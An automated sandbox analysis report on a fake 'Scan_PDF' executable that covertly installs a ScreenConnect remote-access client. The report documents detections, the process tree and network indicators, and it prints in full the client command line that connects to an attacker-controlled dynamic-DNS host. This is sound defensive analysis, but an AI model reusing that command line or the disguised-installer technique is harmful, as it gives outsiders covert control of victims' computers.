Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_PDF_5255303072.exe

Overview

General Information

Sample name:Scan_PDF_5255303072.exe
Analysis ID:1523874
MD5:59a8c372735dafb6e20ad3cf30770d8e
SHA1:c9b28e26d40d9d42a7c19c123103f854501a0edb
SHA256:a337a28b1413ed787b4e313cfb04ffef6a4730cddc7543b18b6b8656e65111a0
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:46
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Scan_PDF_5255303072.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\Scan_PDF_5255303072.exe" MD5: 59A8C372735DAFB6E20AD3CF30770D8E)
    • msiexec.exe (PID: 7972 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
  • msiexec.exe (PID: 8028 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 792F0E17B34DE5D3E63064D1EB6FADE1)
    • msiexec.exe (PID: 8080 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
      • rundll32.exe (PID: 8128 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8184 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
    • msiexec.exe (PID: 7340 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000 MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
  • ScreenConnect.ClientService.exe (PID: 7460 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7136 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 980 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 2492 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Scan_PDF_5255303072.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\4a71ed.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSI74E9.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1398979904.0000000005BF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.Scan_PDF_5255303072.exe.5bf0000.12.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.2.ScreenConnect.WindowsClient.exe.26bfa50.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.0.ScreenConnect.WindowsClient.exe.3b0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.2.Scan_PDF_5255303072.exe.5bf0000.12.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", ProcessId: 7460, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 8028, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 2492, ProcessName: svchost.exe
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Scan_PDF_5255303072.exeReversingLabs: Detection: 18%
                              Source: Scan_PDF_5255303072.exeVirustotal: Detection: 25%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.0% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_042FCC94 CryptProtectData,8_2_042FCC94
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_042FD4D0 CryptProtectData,8_2_042FD4D0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C0007C CryptUnprotectData,8_2_05C0007C
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C00D42 CryptUnprotectData,8_2_05C00D42
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C00062 CryptUnprotectData,8_2_05C00062
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeEXE: msiexec.exeJump to behavior
                              Source: Scan_PDF_5255303072.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: Scan_PDF_5255303072.exeStatic PE information: certificate valid
                              Source: Scan_PDF_5255303072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1503870497.000000001B062000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486251470.00000000023D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_5255303072.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1418668144.0000000000F3D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1392487484.00000000041A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI74E9.tmp.3.dr, 4a71ee.msi.3.dr, MSI74FA.tmp.3.dr, 4a71ed.rbs.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI6E42.tmp.2.dr, 4a71ee.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_5255303072.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: unknownDNS query: name: kkl22.ddns.net
                              Source: global trafficTCP traffic: 192.168.2.3:49710 -> 188.119.113.59:8041
                              Source: Joe Sandbox ViewIP Address: 188.119.113.59 188.119.113.59
                              Source: Joe Sandbox ViewASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: kkl22.ddns.net
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2623297821.0000000001E8E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
